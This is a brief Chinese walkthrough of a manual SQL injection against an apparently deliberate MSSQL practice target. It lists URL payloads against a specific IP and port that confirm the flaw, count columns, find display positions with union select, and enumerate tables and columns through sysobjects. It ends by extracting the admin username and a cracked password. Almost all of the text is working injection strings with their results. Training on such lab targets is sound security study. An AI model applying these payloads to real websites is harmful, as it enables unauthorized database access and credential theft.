Microsoft SQL手工注入漏洞测试
进入靶场环境
测试是否存在漏洞
219.153.49.228:45295/new_list.asp?id=2 and 1=2
猜解字段数
219.153.49.228:45295/new_list.asp?id=2 order by 3
219.153.49.228:45295/new_list.asp?id=2 order by 4
219.153.49.228:45295/new_list.asp?id=2 order by 5 报错
说明一共有4个字段
测试显示位
219.153.49.228:45295/new_list.asp?id=2 and 1=2 union all select '1','2','3','4'
爆出2 3 显示位
猜解数据库名,数据库版本,当前用户
@@version 获取版本信息
db_name() 当前数据库名字
user、system_user,current_user,user_name 获取当前用户名
@@SERVERNAME 获取服务器主机信息
.猜解数据库mozhe_db_v2中的表名
219.153.49.228:45295/new_list.asp?id=2 and 1=2%20 union all select null,(select top 1 name from mozhe_db_v2.dbo.sysobjects where xtype='u'),null,null
219.153.49.228:45295/new_list.asp?id=2 and 1=2%20 union all select null,(select top 1 name from mozhe_db_v2.dbo.sysobjects where xtype='u' and name not in ('manage')),null,null
发现存在表名,manage更像管理员表,所以查看这个表
猜解manage的列名
219.153.49.228:45295/new_list.asp?id=2 and 1=2 union all select null,(select top 1 col_name(object_id('manage'),1) from sysobjects),null,null
表红的代表第几列,分别1,2,3,4
猜解完毕 发现manage表中的username,password
219.153.49.228:45295/new_list.asp?id=2 and 1=2 union all select null,username, password ,null from manage
破解得
用户名admin_mz
密码97285101